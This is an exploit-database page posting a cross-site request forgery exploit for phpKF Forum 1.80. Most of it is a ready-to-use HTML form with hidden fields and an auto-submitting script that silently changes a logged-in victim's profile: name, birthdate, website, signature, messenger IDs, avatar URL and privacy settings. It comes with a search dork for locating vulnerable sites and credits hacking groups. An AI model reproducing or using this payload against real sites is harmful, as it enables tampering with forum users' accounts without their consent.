Home / os / win7

[webapps / 0day] - phpKF Forum 1.80 profil_degistir.php CSRF

Posted on 05 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>phpKF Forum 1.80 profil_degistir.php CSRF Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='phpKF Forum 1.80 profil_degistir.php CSRF Exploit by FreWaL in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=================================================
phpKF Forum 1.80 profil_degistir.php CSRF Exploit
=================================================

# Exploit Title   : phpKF Forum profil_degistir.php CSRF Exploit.
# Google Dork     : php Kolay Forum (phpKF)  ©  2007 - 2010   phpKF Ekibi
# Date            : 05-12-2010
# Author          : FreWaL
# Software Link   : http://www.phpkf.com/dosya.php?no=935
# Version         : 1.80  and  tested on All version
# My Website      : www.imhatimi.org &amp; www.ihtilal.in
 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$
$        phpKF Forum profil_degistir.php CSRF Exploit.   $           
$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
&lt;frewal&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.w0rms.com/profil_degistir_yap.php&quot;&gt;
&lt;br&gt;
&lt;input type=&quot;hidden&quot; name=&quot;profil_degisti_mi&quot; value=&quot;form_dolu&quot;&gt;
&lt;br&gt;
&lt;input type=&quot;hidden&quot; name=&quot;MAX_FILE_SIZE&quot; value=&quot;1022999&quot;&gt;
&lt;br&gt;
&lt;input type=&quot;hidden&quot; name=&quot;islem_turu&quot; value=&quot;normal&quot;&gt;
&lt;br&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;gercek_ad&quot; size=&quot;35&quot; maxlength=&quot;30&quot; value=&quot;NamesLakap&quot;&gt;
&lt;br&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;dogum_tarihi&quot; size=&quot;10&quot; maxlength=&quot;10&quot; value=&quot;07-02-1985&quot;&gt;
&lt;br&gt;
&lt;select class=&quot;formlar&quot; name=&quot;sehir&quot;&gt;
&lt;br&gt;
&lt;option value=&quot;Adana&quot;&gt;Adana&lt;/option&gt;
            &lt;option value=&quot;YurtDýþý&quot;&gt;Yurt Dýþý&lt;/option&gt;
            &lt;option value=&quot;Adana&quot;&gt;Adana&lt;/option&gt;
&lt;/select&gt;
&lt;br&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;web&quot; size=&quot;35&quot; maxlength=&quot;70&quot; value=&quot;http://www.imhatimi.org&quot;&gt;
&lt;br&gt;
&lt;td bgcolor=&quot;#ffffff&quot; class=&quot;liste-veri3&quot; align=&quot;left&quot;&gt;
&lt;select class=&quot;formlar&quot; name=&quot;tema_secim&quot;&gt;&lt;option value=&quot;5renkli&quot;&gt;5renkli&lt;/option&gt;&lt;/select&gt;
&lt;/td&gt;
&lt;br&gt;
&lt;textarea class=&quot;formlar&quot; cols=&quot;36&quot; rows=&quot;9&quot; name=&quot;imza&quot; style=&quot;width: 240px; height: 130px&quot;&gt;Sinirsiz imza&amp;lt;/textarea&amp;gt;
&lt;br&gt;
 
    &lt;tr&gt;
    &lt;td height=&quot;20&quot; colspan=&quot;2&quot; class=&quot;forum_baslik&quot; align=&quot;center&quot;&gt;
ANINDA MESAJLAÞMA ADRESLERÝ
    &lt;/td&gt;
    &lt;/tr&gt;
&lt;br&gt;
    &lt;tr&gt;
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
ICQ Numaranýz:
    &lt;/td&gt;
&lt;br&gt;
    &lt;td bgcolor=&quot;#ffffff&quot; class=&quot;liste-veri3&quot; align=&quot;left&quot;&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;icq&quot; size=&quot;35&quot; maxlength=&quot;30&quot; value=&quot;sanane&quot;&gt;
    &lt;/td&gt;
    &lt;/tr&gt;
&lt;br&gt;
    &lt;tr&gt;
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
AIM Adýnýz:
    &lt;/td&gt;
    &lt;td bgcolor=&quot;#ffffff&quot; class=&quot;liste-veri3&quot; align=&quot;left&quot;&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;aim&quot; size=&quot;35&quot; maxlength=&quot;70&quot; value=&quot;banane&quot;&gt;
&lt;br&gt;
    &lt;/td&gt;
    &lt;/tr&gt;
 
    &lt;tr&gt;
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
MSN Messenger Adýnýz:
    &lt;/td&gt;
    &lt;td bgcolor=&quot;#ffffff&quot; class=&quot;liste-veri3&quot; align=&quot;left&quot;&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;msn&quot; size=&quot;35&quot; maxlength=&quot;70&quot; value=&quot;onane&quot;&gt;
    &lt;/td&gt;
    &lt;/tr&gt;
&lt;br&gt;
    &lt;tr&gt;
    &lt;td class=&quot;liste-veri3&quot;  bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
Yahoo! Messenger Adýnýz:
    &lt;/td&gt;
    &lt;td bgcolor=&quot;#ffffff&quot; class=&quot;liste-veri3&quot; align=&quot;left&quot;&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;yahoo&quot; size=&quot;35&quot; maxlength=&quot;70&quot; value=&quot;bizene&quot;&gt;
    &lt;/td&gt;
    &lt;/tr&gt;
&lt;br&gt;
    &lt;tr&gt;
 
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
Skype Adýnýz:
    &lt;/td&gt;
    &lt;td bgcolor=&quot;#ffffff&quot;  class=&quot;liste-veri3&quot; align=&quot;left&quot;&gt;
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;skype&quot; size=&quot;35&quot; maxlength=&quot;70&quot; value=&quot;sizene&quot;&gt;
    &lt;/td&gt;
    &lt;/tr&gt;
&lt;br&gt;
&lt;input class=&quot;formlar&quot; name=&quot;resim_yukle&quot; type=&quot;file&quot; size=&quot;30&quot; value=&quot;&quot;&gt;
&lt;br&gt; 
&lt;input class=&quot;formlar&quot; type=&quot;text&quot; name=&quot;uzak_resim&quot; size=&quot;35&quot; maxlength=&quot;150&quot; value=&quot;http://www.resimmax.net/wp-content/uploads/2010/04/Bu-resimde-hem-essek-hem-fok-bal%C4%B1g%C4%B1-gizli-120x120.jpg&quot;&gt;   
&lt;br&gt;
Hide Email ? (Email Göster Gizle)
&lt;br&gt;
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
&lt;label style=&quot;cursor: pointer;&quot;&gt;
&lt;input type=radio name=&quot;posta_goster&quot; value=&quot;1&quot; &gt;
Evet&lt;/label&gt;  
&lt;label style=&quot;cursor: pointer;&quot;&gt;
&lt;input type=&quot;radio&quot; name=&quot;posta_goster&quot; value=&quot;0&quot; checked=&quot;checked&quot;&gt;
Hayýr&lt;/label&gt;
    &lt;/td&gt;
&lt;br&gt;
Doðum tarihi
&lt;br&gt; 
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
&lt;label style=&quot;cursor: pointer;&quot;&gt;
&lt;input type=&quot;radio&quot; name=&quot;dogum_tarihi_goster&quot; value=&quot;1&quot; checked=&quot;checked&quot;&gt;
Evet&lt;/label&gt;  
 
&lt;label style=&quot;cursor: pointer;&quot;&gt;
&lt;input type=&quot;radio&quot; name=&quot;dogum_tarihi_goster&quot; value=&quot;0&quot; &gt;
Hayýr&lt;/label&gt;
    &lt;/td&gt;
&lt;br&gt;
Sehir Göster Gizle
&lt;br&gt; 
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
&lt;label style=&quot;cursor: pointer;&quot;&gt;
&lt;input type=&quot;radio&quot; name=&quot;sehir_goster&quot; value=&quot;1&quot; checked=&quot;checked&quot;&gt;
Evet&lt;/label&gt;  
 
&lt;label style=&quot;cursor: pointer;&quot;&gt;
 
&lt;input type=&quot;radio&quot; name=&quot;sehir_goster&quot; value=&quot;0&quot; &gt;
Hayýr&lt;/label&gt;
    &lt;/td&gt;
     
&lt;br&gt;
Online - Offline Göster Gizle
&lt;br&gt;
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
Çevrimiçi Durumunu Göster:
    &lt;/td&gt;
    &lt;td class=&quot;liste-veri3&quot; bgcolor=&quot;#ffffff&quot; align=&quot;left&quot;&gt;
&lt;label style=&quot;cursor: pointer;&quot;&gt;
 
&lt;input type=&quot;radio&quot; name=&quot;gizli&quot; value=&quot;0&quot; checked=&quot;checked&quot;&gt;
Evet&lt;/label&gt;  
 
&lt;label style=&quot;cursor: pointer;&quot;&gt;
&lt;input type=&quot;radio&quot; name=&quot;gizli&quot; value=&quot;1&quot; &gt;
Hayýr&lt;/label&gt;
    &lt;/td&gt;
&lt;br&gt; 
&lt;script&gt; document.forms[0].submit() &lt;/script&gt;
&lt;/form&gt;
&lt;/frewal&gt;
 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$
$         For MecTruy ~ Dr.Ly0n ~ Noxy ~ DeadMaster      $
$              Special Thenx all Security Grup
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-05]</pre></body></html>

 

TOP

Malware :

Exploits :